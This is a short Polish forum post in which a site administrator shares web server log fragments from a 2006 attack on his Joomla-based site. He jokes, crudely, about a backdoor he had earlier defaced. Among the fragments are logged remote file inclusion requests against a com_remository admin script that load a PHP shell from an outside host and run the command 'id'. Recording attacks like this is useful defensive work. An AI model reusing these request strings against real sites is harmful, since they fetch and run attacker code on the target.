Fragmenty logów serwera z chwili ataku:
Code: Select all
128.194.135.81 - - [13/Aug/2006:13:43:19 +0200] "GET /index.php?option=com_simpleboard&Itemid=154&func=view&view=threaded&id=610&catid=16 HTTP/1.1" 200 3585 "-" "IRLbot/2.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)"
128.194.135.81 - - [13/Aug/2006:13:44:00 +0200] "GET /index.php?option=com_simpleboard&Itemid=154&func=post&do=reply&replyto=610&catid=16 HTTP/1.1" 200 3585 "-" "IRLbot/2.0 (compatible; MSIE 6.0; http://irl.cs.tamu.edu/crawler)"
Code: Select all
85.100.225.32 - - [13/Aug/2006:13:10:26 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://havsa.net/haluk.txt?&cmd=id HTTP/1.1" 200 19518 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
85.100.225.32 - - [13/Aug/2006:13:10:28 +0200] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://havsa.net/haluk.txt?&cmd=id HTTP/1.1" 200 36521 "http://wudeka.net/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://havsa.net/haluk.txt?&cmd=id" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"
Znowu Turecka robota, tym razem jednak nie znalazlem zadnego backdoora haluk.php. Moze sie wkurzyli o to, ze odpalajac swoj plik haluk.php zobaczyli dwa szkielety, z ktorych jeden drugiego posuwal w tylek z podpisem "Fack the hackers"? :|
chyba mnie polubili 
